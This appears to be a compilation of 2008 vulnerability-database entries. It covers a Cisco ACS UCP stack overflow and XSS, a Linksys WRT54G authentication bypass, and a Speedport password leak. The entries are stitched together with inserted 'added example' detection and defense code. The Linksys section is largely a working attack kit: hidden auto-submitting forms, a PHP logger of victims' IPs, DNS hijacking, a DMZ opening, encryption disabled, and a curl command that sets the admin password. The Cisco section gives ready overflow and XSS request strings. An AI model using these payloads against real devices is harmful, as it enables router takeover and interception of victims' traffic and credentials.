http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml

In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.

* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History
================

+-----------------------------------------------------+
| Revision 1.0 | 2008-Mar-12 | Initial Public Release |
+-----------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFH1/jr86n/Gc8U/uARAs8RAJ9CjRFqB8rwYtrpXTVIol2QW7jG9wCeMT/F
u8p4qv+1c9/UQTmBx5TR7O4=
=U667
-----END PGP SIGNATURE-----
________________________________________________________________________

Recurity Labs GmbH
http://www.recurity-labs.com
entomology@recurity-labs.com

Date: 12.03.2008

________________________________________________________________________

Vendor: Cisco Systems
Product: Cisco Secure Access Control Server (ACS) for Windows
         User-Changeable Password (UCP) application
Vulnerability: Multiple remote pre-authentication buffer overflows
               Cross Site Scripting issue
Affected Releases: ACS 3 and 4, UCP v3.3.4.12.5, CSuserCGI 3.3.1
NOT Affected Releases: UCP 4.2 and above
Severity: HIGH
CVE: CVE-2008-0532, CVE-2008-0533

________________________________________________________________________

Vendor communication:

20.11.2007 Initial notification to PSIRT
20.11.2007 Response from PSIRT, PGP encrypted to PSIRT only
26.11.2007 Response from Paul Oxman / PSIRT
26.11.2007 Even more detailed information to Paul Oxman
27.11.2007 Received new PGP keys from PSIRT
27.11.2007 Retransmit
28.11.2007 Paul Oxman reports they are working on it
28.11.2007 Fix discussions with Paul Oxman
29.11.2007 Paul Oxman provides Cisco Bug IDs
29.11.2007 Fix discussions with Paul Oxman
12.12.2007 Fixed version provided for testing
13.12.2007 Feedback to the fixed code
14.12.2007 Paul Oxman acknowledges feedback
17.12.2007 Paul Oxman reports internal progress
17.12.2007 More feedback
08.01.2008 Paul Oxman reports internal progress
08.01.2008 ACK
30.01.2008 Paul Oxman proposes advisory release date
30.01.2008 Acknowledging advisory release date
27.02.2008 Paul Oxman updates on progress
27.02.2008 ACK
05.03.2008 Paul Oxman sends draft Cisco advisory
05.03.2008 Sending draft Recurity Labs advisory
06.03.2008 Paul Oxman provides fixed release version
06.03.2008 Final communication with Paul Oxman
12.03.2008 Coordinated release

________________________________________________________________________

Overview:

Cisco Secure Access Control Server (ACS) for Windows User-Changeable Password (UCP) application is a set
of CGI programs and web site contents installed on Microsoft IIS. One of these programs, CSuserCGI.exe, contains remote pre-authentication stack buffer overflows. Additionally, CSuserCGI.exe suffers from a non-persistent Cross Site Scripting vulnerability.

Description:

The main() function of CSuserCGI.exe compares the first command line argument passed to the program using strcmp() against a list of supported arguments, among them "Logout", "Main", "ChangePass", etc. For most of the arguments, it will simply parse the following arguments and pass them to a wsprintf() call with format strings like "Action=%s&Username=%s&OldPass=%s&NetPass=%s". The destination buffer of these calls is located in the .data segment of the application.

In case of the "Logout" argument, main() passes the second argument, usually of the form "1234.xyzab.c.username.", as well as a char[] buffer on the stack to a function that first extracts the string up to the first '.' character using strtok and then copies the string into the supplied char[] buffer. The char buffer is 96 bytes long. Accordingly, if the string before the first dot character exceeds this length, the buffer as well as the return address is overwritten.

.text:00401065 mov eax, [ebx+8] ; get argv[2]
.text:00401068 test eax, eax
.text:0040106A jz loc_401520
.text:00401070 push eax ; char *
.text:00401071 call sub_402870
...
.text:00402870 sub esp, 60h
.text:00402873 mov ecx, 17h
.text:00402878 xor eax, eax
.text:0040287A push edi
.text:0040287B lea edi, [esp+64h+var_60]
.text:0040287F rep stosd
.text:00402881 mov ecx, [esp+64h+arg_0]
.text:00402885 stosw
.text:00402887 stosb
.text:00402888 lea eax, [esp+64h+var_60]
.text:0040288C push eax ; int
.text:0040288D push ecx ; char *
.text:0040288E call sub_402940
...
.text:00402940 mov ecx, [esp+arg_0]
.text:00402944 xor eax, eax
.text:00402946 test ecx, ecx
.text:00402948 jz locret_402A11
.text:0040294E push ebx
.text:0040294F push esi
.text:00402950 push edi
.text:00402951 push offset a_ ; "."
.text:00402956 push ecx ; char *
.text:00402957 call _strtok
.text:0040295C mov edi, eax
.text:0040295E or ecx, 0FFFFFFFFh
.text:00402961 xor eax, eax
.text:00402963 mov ebx, [esp+14h+arg_4]
.text:00402967 repne scasb
.text:00402969 not ecx
.text:0040296B sub edi, ecx
.text:0040296D lea edx, [ebx+1]
.text:00402970 mov eax, ecx
.text:00402972 mov esi, edi
.text:00402974 mov edi, edx
.text:00402976 push offset a_ ; "."
.text:0040297B shr ecx, 2
.text:0040297E rep movsd
.text:00402980 mov ecx, eax
.text:00402982 push 0 ; char *
.text:00402984 and ecx, 3
.text:00402987 rep movsb

Example:

The following request will cause EIP to be overwritten with 0x42424242. The line may wrap, depending on how you view this file.

https://target/securecgi-bin/CSUserCGI.exe?Logout+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB.xyzab.c.hacker.

A non-persistent Cross Site Scripting vulnerability can also be triggered using the Help facility of the CGI. An example request would be as follows. The line may wrap, depending on how you view this file.

https://target/securecgi-bin/CSUserCGI.exe?Help+00.lala.c.hacker%22%22%22%3E%3Ch1%3EHello_Cisco%3C/h1%3E

Solution:

Update to UCP version 4.2. See the Cisco Advisory for how to obtain fixed software:
http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml

________________________________________________________________________

Credit:

The vulnerabilities were identified by Felix 'FX' Lindner, Recurity Labs GmbH, during a cursory inspection of a customer installation of the ACS UCP product.

Greets to the teams at Recurity Labs and Zynamics, Sergio Alvarez, Max Moser, Alexander Kornbrust, Maxim Salomon, Nicolas Fischbach, Karsten Schumann, Frank Becker, PSIRT, Paul Oxman, John Stewart

________________________________________________________________________

The information provided is released "as is" without warranty of any kind.
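The two request shapes above are easy to pick out of web-server logs once you know how the CGI receives them. The following is an added example, written for this page and not code from the Recurity Labs or Cisco advisories: a classifier that reproduces the CGI "indexed query" rule (RFC 3875 section 4.4: a query string without '=' is split on '+' into the program's argv, which is why ?Logout+<session> reaches main() as argv[1]="Logout", argv[2]="<session>"), applies the same strtok-on-'.' split the binary performs, and flags a first token that no longer fits the 96-byte frame. The threshold and the return-address offset of 95 are my own reading of the listing (0x60-byte buffer, copy landing at buffer+1), not figures stated in the advisory, and the log lines are constructed, not captured traffic.

```javascript
// Added example, not part of the Recurity Labs or Cisco advisories.
// Classifies CSuserCGI.exe requests by the two shapes described above.
//
// CGI "indexed query" rule (RFC 3875, section 4.4): if the query string has no
// '=', the server splits it on '+' and passes the pieces as argv, so
//   ?Logout+1234.xyzab.c.username.
// reaches main() as argv[1] = "Logout", argv[2] = "1234.xyzab.c.username.".

// Stack numbers read from the listing above (my derivation; the advisory only
// states "96 bytes"): sub_402870 reserves 0x60 bytes and sub_402940 copies the
// token plus its NUL to buffer+1, so the saved return address begins at token
// offset 95 and a token of 95 or more bytes already clobbers it.
const SESSION_BUF = 0x60;
const COPY_OFFSET = 1;
const RET_OFFSET = SESSION_BUF - COPY_OFFSET;          // 95
const MAX_SAFE_TOKEN = SESSION_BUF - COPY_OFFSET - 1;  // 94 bytes plus NUL still fit

function parseIndexedQuery(query) {
  if (query.includes('=')) return null;               // ordinary form query, not argv
  const argv = query.split('+').map(piece => {
    try { return decodeURIComponent(piece); } catch (e) { return piece; }
  });
  return { verb: argv[0], args: argv.slice(1) };
}

function classifyUcpRequest(pathAndQuery) {
  const m = /\/securecgi-bin\/CSuserCGI\.exe(?:\?(.*))?$/i.exec(pathAndQuery);
  if (!m) return 'not-ucp';
  const req = m[1] ? parseIndexedQuery(m[1]) : null;
  if (!req) return 'benign';
  if (req.verb === 'Logout' && req.args.length > 0) {
    const token = req.args[0].split('.')[0];          // what strtok(argv[2], ".") yields
    if (token.length > MAX_SAFE_TOKEN) return 'overflow';
  }
  if (req.verb === 'Help' && req.args.some(a => /[<>"']/.test(a))) return 'xss';
  return 'benign';
}

// Constructed W3C-style IIS log lines: date time method cs-uri-stem cs-uri-query sc-status.
// Illustrative only, not captured traffic.
const SAMPLE_LOG = [
  '2008-03-12 10:00:01 GET /securecgi-bin/CSuserCGI.exe Main+1234.xyzab.c.alice. 200',
  '2008-03-12 10:00:05 GET /securecgi-bin/CSuserCGI.exe Logout+' + 'A'.repeat(95) + 'BBBB.xyzab.c.hacker. 500',
  '2008-03-12 10:00:09 GET /securecgi-bin/CSuserCGI.exe Help+00.lala.c.hacker%22%22%22%3E%3Ch1%3EHello_Cisco%3C/h1%3E 200',
  '2008-03-12 10:00:12 GET /index.html - 200',
];

function scanLog(lines) {
  return lines.map(line => {
    const [date, time, method, stem, query, status] = line.trim().split(/\s+/);
    const target = query === '-' ? stem : stem + '?' + query;   // IIS logs '-' for an empty query
    return { time: date + ' ' + time, method, status, target, verdict: classifyUcpRequest(target) };
  });
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of scanLog(SAMPLE_LOG)) console.log(r.verdict.padEnd(9), r.target.slice(0, 70));
}
```

The Logout check is deliberately keyed to the token before the first dot rather than to total argument length, because that is the value strtok hands to the copy; a long session string whose first dotted component is short does not reach the return address. Treat an HTTP 500 on a flagged Logout request as a crash indicator worth correlating with the IIS application log.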
The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages. The contents of this advisory are copyright (c) 2008 Recurity Labs GmbH and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. ________________________________________________________________________
VAR-200803-0170 CVE-2008-1247 Linksys WRT54g On the router Web Vulnerability to execute arbitrary administrator operations in the interface

Related entries in the VARIoT exploits database: VAR-E-200803-0228, VAR-E-200803-0227
CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. NOTE: the Security.tri vector is already covered by CVE-2006-5202. This issue may overlap with CVE-2006-5202. A third party may perform arbitrary administrator actions through direct requests to: (1) Advanced.tri (2) AdvRoute.tri (3) Basic.tri (4) ctlog.tri (5) ddns.tri (6) dmz.tri (7) factdefa.tri (8) filter.tri (9) fw.tri (10) manage.tri (11) ping.tri (12) PortRange.tri (13) ptrigger.tri (14) qos.tri (15) rstatus.tri (16) tracert.tri (17) vpn.tri (18) WanMac.tri (19) WBasic.tri (20) WFilter.tri. Linksys WRT54G Wireless-G Router is prone to multiple authentication-bypass vulnerabilities. Successful exploits will allow unauthorized attackers to gain access to administrative functionality and completely compromise vulnerable devices; other attacks are also possible. The issues affect firmware v1.00.9; other versions may also be vulnerable.
----------------------------------------------------------------------

TITLE:
Linksys WRT54G Security Bypass Vulnerability

SECUNIA ADVISORY ID:
SA29344

VERIFY ADVISORY:
http://secunia.com/advisories/29344/

CRITICAL:
Less critical

IMPACT:
Security Bypass

WHERE:
From local network

OPERATING SYSTEM:
Linksys WRT54G Wireless-G Broadband Router
http://secunia.com/product/3523/

DESCRIPTION:
meathive has reported a vulnerability in Linksys WRT54G, which can be exploited by malicious people to bypass certain security restrictions.

The vulnerability is caused due to improper authorization checks when performing administrative actions via the web interface. This can be exploited to perform restricted actions by directly accessing Basic.tri, factdefa.tri, manage.tri, WBasic.tri, WFilter.tri, dmz.tri, ddns.tri, WanMac.tri, AdvRoute.tri, Advanced.tri, fw.tri, vpn.tri, filter.tri, PortRange.tri, ptrigger.tri, qos.tri, ctlog.tri, ping.tri, tracert.tri, or rstatus.tri.

SOLUTION:
WRT54G v5/v6: Install version 1.02.5.
WRT54G v8: Install version 8.00.5.
WRT54G v8.2: Install version 8.2.05.

PROVIDED AND/OR DISCOVERED BY:
meathive

ORIGINAL ADVISORY:
http://kinqpinz.info/lib/wrt54g/own.txt

----------------------------------------------------------------------
++| Intro
----------------------

This text is in addition to the findings I have already made public regarding the Linksys WRT54G wireless router and firewall gateway device. The scripts that process configuration changes do not require authentication and therefore can be altered _remotely_ via simple form submissions written in HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous findings and the demo page with sample exploits.

++| Let's Get Dirty
----------------------

You may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows how forms can be constructed in HTML that take advantage of the major flaws present within the insecure router. In my previous documentation I showed how it is possible to alter configuration parameters both via the Linux command line using curl and via HTML form submissions. In this text I demonstrate how to do these very same things transparently using a combination of HTML form construction with JavaScript that automagically submits our desired changes. The JavaScript is simple and is only used for submitting the form - a user-free mechanism that will redirect the user to their router and prompts them to log in. Once again, THE REQUEST TO AUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS.
The following is all that is required in order to submit our form, which will be constructed using the GET parameters observed in the device's Web interface.

document.f.submit();

This submits forms hidden within the Webpage. Our first example code enables wireless access with an SSID of our choosing. In this instance, I will use the SSID "kinqpinz".

<form name="f" action="http://192.168.1.1/WBasic.tri" method="POST">
<input type="hidden" name="submit_type" value="">
<input type="hidden" name="channelno" value="11">
<input type="hidden" name="OldWirelessMode" value="3">
<input type="hidden" name="Mode" value="3">
<input type="hidden" name="SSID" value="kinqpinz">
<input type="hidden" name="channel" value="6">
<input type="hidden" name="Freq" value="6">
<input type="hidden" name="wl_closed" value="1">
<input type="hidden" name="sesMode" value="1">
<input type="hidden" name="layout" value="en">
</form>

The reason this works is simple: configuration parameters are constructed in the URL in the Web interface, hosted by default at the address http://192.168.1.1. One can view these parameters while configuring their device. The code above simply constructs a URL that is processed by the router's firmware script WBasic.tri. The URL resembles the following if you were to view it within your browser:

http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en

It's simple enough to understand what's going on. Each variable passed in the URL describes exactly what its purpose is - at least the important ones such as "SSID" and "channel". The only tricky part to exploiting the router is the fact that you cannot alter settings using a URL like the one above. That would result in a GET request to the device, whereas we're interested in POST requests, which are what actually trigger configuration changes. A GET request does nothing.
Below I describe a real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript, and a touch of PHP to grab the mark's external IP.

++| Remote Real World Attack Scenario
----------------------

So http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It has made a few assumptions about your environment, however. One major assumption is that you've kept your router's default local gateway address, namely 192.168.1.1. No matter what other changes you've made to the router in terms of security, e.g., strong password, wireless encryption, access restrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do NOT retain the default local address of 192.168.1.1. It is important that you change this address so that you do not fall victim to a malicious individual hosting code such as that presented in this text.

++| Remote Real World Attack Scenario Requirements
----------------------

On http://www.hacker.tld a page is hosted that contains the following: (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely; (2) JavaScript that submits these forms transparently; (3) PHP or similar server-side code that acquires the mark's external IP address as they browse the page; and (4) PHP or similar server-side code that retains the mark's external IP address in the event that the remote form submission is successful, thus allowing the remote attacker to further exploit the device.

http://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP is used - though any server-side language is suitable - for obtaining the external IP of any individual viewing the exploit page and writing this information to a log file.
<?php
$ip=$_SERVER['REMOTE_ADDR'];
$toWrite="Potential mark resides at $ip\n\n";
$f=fopen("mark.txt", "a+");
fwrite($f, $toWrite);
fclose($f);
?>

The JavaScript is as simple as retrieving the form object identified by the 'name' HTML attribute and submitting the form.

<script type="text/javascript">
document.f.submit();
</script>

All hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the HTML form's 'hidden' attribute.

<form name="f" action="http://192.168.1.1/WBasic.tri" method="POST">
<input type="hidden" name="submit_type" value="">
<input type="hidden" name="channelno" value="11">
<input type="hidden" name="OldWirelessMode" value="3">
<input type="hidden" name="Mode" value="3">
<input type="hidden" name="SSID" value="kinqpinz">
<input type="hidden" name="channel" value="6">
<input type="hidden" name="Freq" value="6">
<input type="hidden" name="wl_closed" value="1">
<input type="hidden" name="sesMode" value="1">
<input type="hidden" name="layout" value="en">
</form>

What you should observe from this is the form name of "f" which is used in the JS to submit the form, as well as the various 'name' and 'value' attributes that are used to create a URL such as this:

submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en

Do note that without any one of these parameters, the exploit fails and nothing changes. All of the elements must remain in place even if they do not directly make sense. They are simply options that the processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case matters, and do not forget that the request must be POST, not GET. Also, different config changes require different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log.
Now that the malicious page has been composed and sits online, living and waiting for marks at http://www.hacker.tld/index.php, each request made to the page is logged using our custom PHP logging script. In mark.txt, our logging file, sample output would resemble something like the following.

Potential mark resides at 1.1.1.1

Potential mark resides at 2.2.2.2

Potential mark resides at 3.3.3.3

So forth...

They are potential marks because it is unknown whether or not they are using the WRT54G with a supported firmware version that is exploitable using these techniques, and/or whether the exploit attempt failed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not using the default local address (good for them) that this attack relies on. When they browse the page, because we have set no timeout for this change to occur, they are instantly redirected to http://192.168.1.1/WBasic.tri. Because the submission is a POST rather than a GET, the resulting URL reveals nothing about what was sent, so even an attentive user may continue on with whatever they were doing, more often than not unaware of what has just happened. At the same time our PHP script has logged this access attempt to mark.txt, which we can retrieve at our leisure to further test whether or not the remote host is vulnerable to attack. At the very least, we may decide to completely reset the router so that we know its current state, making further compromise a snap, such as altering the device's DNS records for sniffing traffic. This is quite feasible; here's how.
<form method="post" action="http://192.168.1.1/factdefa.tri">
<input type="hidden" name="FactoryDefaults" value="Yes">
<input type="hidden" name="layout" value="en">
<input type="submit">
</form>

This gives us the following URL:

http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en

Now we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs all incoming and outgoing requests before passing them on to the next in line.

<form method="post" action="http://192.168.1.1/Basic.tri">
<input type="hidden" name="dhcp_end" value="149">
<input type="hidden" name="oldMtu" value="1500">
<input type="hidden" name="oldLanSubnet" value="0">
<input type="hidden" name="OldWanMode" value="0">
<input type="hidden" name="SDHCP1" value="192">
<input type="hidden" name="SDHCP2" value="168">
<input type="hidden" name="SDHCP3" value="1">
<input type="hidden" name="SDHCP4" value="100">
<input type="hidden" name="EDHCP1" value="192">
<input type="hidden" name="EDHCP2" value="168">
<input type="hidden" name="EDHCP3" value="1">
<input type="hidden" name="EDHCP4" value="150">
<input type="hidden" name="pd" value="">
<input type="hidden" name="now_proto" value="dhcp">
<input type="hidden" name="old_domain" value="">
<input type="hidden" name="chg_lanip" value="192.168.1.1">
<input type="hidden" name="_daylight_time" value="1">
<input type="hidden" name="wan_proto" value="0">
<input type="hidden" name="router_name" value="WRT54G">
<input type="hidden" name="wan_hostname" value="">
<input type="hidden" name="wan_domain" value="">
<input type="hidden" name="mtu_enable" value="0">
<input type="hidden" name="lan_ipaddr_0" value="192">
<input type="hidden" name="lan_ipaddr_1" value="168">
<input type="hidden" name="lan_ipaddr_2" value="1">
<input type="hidden" name="lan_ipaddr_3" value="1">
<input type="hidden" name="lan_netmask" value="0">
<input type="hidden" name="lan_proto" value="Enable">
<input type="hidden" name="dhcp_start" value="100">
<input type="hidden" name="dhcp_num" value="50">
<input type="hidden" name="dhcp_lease" value="0">
<input type="hidden" name="dns0_0" value="1">
<input type="hidden" name="dns0_1" value="2">
<input type="hidden" name="dns0_2" value="3">
<input type="hidden" name="dns0_3" value="4">
<input type="hidden" name="dns1_0" value="5">
<input type="hidden" name="dns1_1" value="6">
<input type="hidden" name="dns1_2" value="7">
<input type="hidden" name="dns1_3" value="8">
<input type="hidden" name="dns2_0" value="9">
<input type="hidden" name="dns2_1" value="8">
<input type="hidden" name="dns2_2" value="7">
<input type="hidden" name="dns2_3" value="6">
<input type="hidden" name="wins_0" value="0">
<input type="hidden" name="wins_1" value="0">
<input type="hidden" name="wins_2" value="0">
<input type="hidden" name="wins_3" value="0">
<input type="hidden" name="time_zone" value="%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29">
<input type="hidden" name="daylight_time" value="ON">
<input type="hidden" name="layout" value="en">
<input type="submit">
</form>

This is indeed convoluted, but all of these values must be in place in order to be successful. What is it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our own custom values; in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8, and DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while obtaining its dynamic IP from the ISP. In case you're curious, these forms are used to construct the following URL that is submitted to http://192.168.1.1/Basic.tri.
http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en

++| An Alternative (with JavaScript)
----------------------

This is the basic exploitation method of the router, although the attacker has many alternatives for submitting configuration changes, assuming you allow client-side scripts to execute, namely JavaScript. A few alternative methods would include using a JavaScript onClick function within a standard looking HTML anchor tag to submit the information with XMLHttpRequest, e.g.:

<a href="/path/" onClick="xhrRequest();">This looks innocent enough.</a>

...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this standard looking navigation link, e.g.:

var xhr=false;
if(window.XMLHttpRequest) {
  xhr=new XMLHttpRequest();
} else if(window.ActiveXObject) {
  // legacy Internet Explorer
  xhr=new ActiveXObject("Microsoft.XMLHTTP");
}

function xhrRequest() {
  if(xhr) {
    // same POST the hidden form would make, without a page navigation
    xhr.open("POST", "http://192.168.1.1/Security.tri", true);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange=function() {
      if(xhr.readyState == 4 && xhr.status == 200) {
        var success=xhr.responseText;
      }
    }
    xhr.send("SecurityMode=0&layout=en");
  }
}

Note that XMLHttpRequest is bound by the same-origin policy: a browser without CORS support refuses the cross-origin request outright, and a CORS-capable browser will send this form-encoded POST but never expose the response to the page, so the plain form submissions shown above are the more reliable delivery mechanism.

The example above effectively disables all wireless encryption, so that if you happen to live close enough to this poor individual, it is your duty to pwn their wireless by enabling open access for
everybody in the neighborhood! Here's the URL for disabling wireless encryption:

http://192.168.1.1/Security.tri?SecurityMode=0&layout=en

++| An Alternative (without JavaScript)
----------------------

You're still exploitable even if you do not allow scripts to execute, e.g., you use Firefox + NoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent looking methods of compromising your WRT54G. For example, user registration for a bulletin board or forum system. The site must acquire a minimal amount of information in order to create the account, so it is in submitting this data that we may submit our own payload; perhaps this time we'd like to enable the DMZ for complete access to any and all shares/services on our mark's computer. Here is the URL once again:

http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en

Again it is a different script processing the request on behalf of the router's internal operating system, dmz.tri, but it still does not require authentication prior to changing the settings we wish to change. All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.:

<form method="post" action="http://192.168.1.1/dmz.tri">
<input type="hidden" name="action" value="Apply">
<input type="hidden" name="dmz_enable" value="1">
<input type="hidden" name="dmz_ipaddr" value="100">
<input type="hidden" name="layout" value="en">

...and add these values to their user registration page with standard username/password/e-mail fields...

Username: <input type="text" name="username"><br>
Password: <input type="password" name="password1"><br>
Confirm Password: <input type="password" name="password2"><br>
<input type="submit">
</form>

...such as can be found on traditional forums these days.
The mark submits and exploits his/her own router although they believe they are at least minimally technically savvy by using a combination of technologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms we use to store the router configs are hidden, and the normal user registration forms are not, thus it is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has detected that a potential attack is taking place it is likely too late as the mastermind behind http://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up targets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration changes within 10 seconds, which is plenty of time for them to open another terminal and change the administrative login to block our mark from changing their settings, e.g.: curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=pwn&http_passwdConfirm=pwn&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http://<REMOTE_EXTERNAL_ADDR>/manage.tri Here the hacker can now log in as admin with password 'pwn' with complete freedom to _REMOTELY_ monitor the mark's internal and outgoing network traffic. This can allow for capturing passwords via DNS poisoning on the router, man-in-the-middle attacks by pointing the local address of the router to a rogue DHCP server and accordingly, rogue network of the attacker's, plus more. ++| Conclusion ---------------------- It is my intention in finalizing this document that the reader understands that the Linksys WRT54G firmware version 1.00.9 does not care if you inside or outside its local network. Nor does it care whether or not you have the level of privilege thought to be necessary for manipulating sensitive objects. Thanks go to hw2B for suggesting I write all of this garbage out. 
++| URLs ---------------------- https://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document) https://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008) https://kinqpinz.info/lib/wrt54g/own2.txt (this document) http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247)
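An added example (not part of the write-up above, and not Linksys code): the authorization logic a router's configuration handlers would need in order to defeat both delivery methods shown, written in Python and exercised against requests shaped like the Security.tri and dmz.tri payloads. The cookie name, the session store, the csrf_token form field and the router origin http://192.168.1.1 are assumptions made for the example.

```python
import hmac
import secrets
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Only the router's own pages may submit configuration changes (assumed LAN address).
ROUTER_ORIGINS = {"http://192.168.1.1"}


@dataclass
class Request:
    """Minimal stand-in for an incoming HTTP request (constructed for this example)."""
    method: str
    path: str
    headers: dict
    body: str = ""

    def form(self):
        return {k: v[0] for k, v in parse_qs(self.body).items()}


class SessionStore:
    """Login state keyed by a random cookie; each session carries its own CSRF token."""

    def __init__(self):
        self._tokens = {}

    def login(self):
        sid, token = secrets.token_hex(16), secrets.token_hex(16)
        self._tokens[sid] = token
        return sid, token

    def token_for(self, sid):
        return self._tokens.get(sid)


def _cookie(req, name):
    for part in req.headers.get("Cookie", "").split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return None


def _source_origin(req):
    """Origin header if present, else scheme+host of the Referer; None if neither."""
    origin = req.headers.get("Origin")
    if origin:
        return origin
    referer = req.headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        return f"{parts.scheme}://{parts.netloc}"
    return None


def authorize_config_change(req, sessions):
    """Return (allowed, reason) for a request to a config handler such as Security.tri
    or dmz.tri. Each check blocks one of the delivery methods shown above."""
    if req.method != "POST":
        return False, "state change via GET"            # blocks the bare URL
    sid = _cookie(req, "session")
    expected = sessions.token_for(sid) if sid else None
    if expected is None:
        return False, "no authenticated session"        # blocks anonymous cross-site POSTs
    if _source_origin(req) not in ROUTER_ORIGINS:
        return False, "cross-site origin"               # blocks XHR/form posts from hacker.tld
    supplied = req.form().get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or wrong csrf token"     # blocks pages that never rendered on the router
    return True, "ok"
```

The three checks are independent. The session check stops the anonymous cross-site POST; the Origin/Referer check stops a cross-site POST that the browser sends with the administrator's cookie attached; the per-session token stops any page that was never served by the router, which is the case for the hidden-field registration form. A handler that performs none of them, as the .tri scripts above do, is reachable from any page the administrator's browser happens to load.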
VAR-200803-0175 CVE-2008-1252 Deutsche Telekom Speedport W500 b_banner.stm logon password disclosure vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
b_banner.stm (aka the login page) on the Deutsche Telekom Speedport W500 DSL router allows remote attackers to obtain the logon password by reading the pwd field in the HTML source. Speedport W500 is prone to an information-disclosure vulnerability. Exploiting this issue may allow an unauthenticated remote attacker to retrieve sensitive information that may lead to further attacks.

----------------------------------------------------------------------
